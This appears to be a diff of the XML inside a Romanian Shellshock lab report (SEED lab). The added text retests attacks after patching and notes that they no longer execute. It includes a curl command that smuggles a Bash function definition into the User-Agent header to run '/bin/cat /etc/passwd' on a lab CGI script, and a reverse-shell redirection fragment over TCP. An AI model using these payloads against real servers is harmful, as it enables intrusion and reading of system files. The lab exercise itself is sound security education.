-          <w:szCs w:val="22"/>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hell-ul interactiv se va deschide prin: </w:t>
+        <w:t xml:space="preserve">shell-ul interactiv se va deschide prin: </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5220,6 +5210,27 @@
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
         <w:t>0&lt;&amp;1 2&gt;&amp;1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="3"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="29"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">stdout si stdin prin tcp </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5571,17 +5582,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
@@ -5660,8 +5660,789 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-        <w:spacing w:before="240" w:after="60"/>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="25">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>185420</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>-635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5406390" cy="1381125"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="24" name="Image24" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="24" name="Image24" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId36"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5406390" cy="1381125"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="26">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>787400</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>59690</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="4257675" cy="1914525"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="25" name="Image25" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="25" name="Image25" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId37"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4257675" cy="1914525"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>in continuare incercam un atac de tipul celui de la 3 prin care incercam sa afisam continutul fisierului etc/shadow:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -A "() { echo salut;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}; </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">echo Content_type: text/plain; echo; </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="1440" w:hanging="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/bin/cat /etc/passwd" -v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId38">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>vul</w:t>
+        </w:r>
+        <w:hyperlink r:id="rId39">
+          <w:r>
+            <w:rPr>
+              <w:rStyle w:val="InternetLink"/>
+              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+              <w:b w:val="false"/>
+              <w:bCs w:val="false"/>
+              <w:i w:val="false"/>
+              <w:iCs w:val="false"/>
+              <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+            </w:rPr>
+            <w:t>.cgi</w:t>
+          </w:r>
+        </w:hyperlink>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>v</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>om observa ca parsarea se va face corect și nu se va executa comanda cât pe etc/passwd; vom vedea doar executia scriptului din vul.cgi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="27">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:align>center</wp:align>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5943600" cy="1547495"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="26" name="Image26" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="26" name="Image26" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId40"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="1547495"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="11"/>
+        </w:numPr>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">incercam de asemnea atacul de la punctul 5 prin care dorim sa obtinem un reverse shell si de asemenea observam ca parsarea se realizeaza cu succes, doar se va executa scriptul </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">vul.cgi </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:ind w:left="720" w:hanging="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:anchor behindDoc="0" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="28">
+            <wp:simplePos x="0" y="0"/>
+            <wp:positionH relativeFrom="column">
+              <wp:posOffset>90170</wp:posOffset>
+            </wp:positionH>
+            <wp:positionV relativeFrom="paragraph">
+              <wp:posOffset>635</wp:posOffset>
+            </wp:positionV>
+            <wp:extent cx="5715000" cy="1884680"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:wrapSquare wrapText="largest"/>
+            <wp:docPr id="27" name="Image27" descr=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="27" name="Image27" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId41"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="1884680"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:anchor>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:spacing w:before="0" w:after="200"/>
         <w:rPr>
           <w:lang w:val="ro-RO"/>
         </w:rPr>
@@ -5671,7 +6452,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId36"/>
+      <w:headerReference w:type="default" r:id="rId42"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
